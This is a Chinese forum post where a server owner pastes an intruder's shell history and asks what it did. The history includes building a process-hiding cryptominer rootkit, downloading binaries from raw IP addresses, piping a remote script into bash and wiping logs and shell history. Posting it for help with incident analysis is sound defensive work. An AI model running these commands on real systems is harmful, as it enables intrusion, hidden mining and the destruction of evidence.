直接进入主题
操作日志
1 export TERM=xterm 2 top 3 /usr/lib/sys/rcu_bj 4 cd /usr/lib/sys/ 5 ls 6 chmod +x rcu_bj 7 ./rcu_bj 8 chattr -ia rcu_bj 9 ./rcu_bj 10 cd / 11 mkdir .a 12 cd .a 13 git clone https://github.com/alfonmga/hiding-cryptominers-linux-rootkit.git 14 cd hiding-cryptominers-linux-rootkit/ 15 ls 16 make 17 dmesg 18 dmesg -C 19 ls 20 make 21 ls 22 make 23 make 24 cd .. 25 rm -rf hiding-cryptominers-linux-rootkit/ 26 curl -LO http://1.234.16.54:7070/apiapi/api/raw/master/s.zip;mv s.zip rcu;chmod +x rcu 27 ./rcu 28 top 29 rm -rf /var/log/* 30 cat /dev/null > ~/.bash_history 31 id 32 curl http://123.30.179.206:8189/solr/.v7/api | bash 33 ps auxw --sort=%cpu|tail -10 34 lscpu 35 ps auxw --sort=%cpu|tail -10 36 ps auxw --sort=%cpu|tail -10 37 ps auxw --sort=%cpu|tail -10 38 ps aux | grep rcu 39 python -c 'import pty; pty.spawn("/bin/bash")' 帮忙解读下这段脚本都干嘛了-_-
https://github.com/alfonmga/hiding-cryptominers-linux-rootkit
下载的这个脚本看用途是用来隐藏文件夹和进程的
3 个可疑文件看起来没有隐藏文件属性,但是无法删除
[root@localhost profile.d]# cd /usr/lib/sys [root@localhost sys]# ll 总用量 8 -rwxr-x--x 1 root confluence 0 12 月 1 18:38 rcu_bj -rwxr-x--- 1 root confluence 2786 11 月 14 11:01 rcu_libk -rwxrwx--- 1 root root 1199 11 月 14 11:01 rcu_udev -rwxr-x--- 1 root confluence 0 11 月 14 18:02 systemd [root@localhost sys]# lsattr rcu_bj ---------------- rcu_bj 您在 /var/spool/mail/root 中有邮件 [root@localhost sys]# lsattr rcu_libk ---------------- rcu_libk [root@localhost sys]# lsattr rcu_undev lsattr: 没有那个文件或目录 当尝试对 rcu_undev 进行 stat 调用时 [root@localhost sys]# lsattr rcu_udev ---------------- rcu_udev 进程也杀不死
[root@localhost sys]# ps -ef|grep rcu root 8 2 0 4 月 13 ? 00:00:06 [rcu_bh] root 9 2 0 4 月 13 ? 22:01:59 [rcu_sched] root 168224 243031 0 16:28 pts/24 00:00:00 grep --color=auto rcu 
Select Language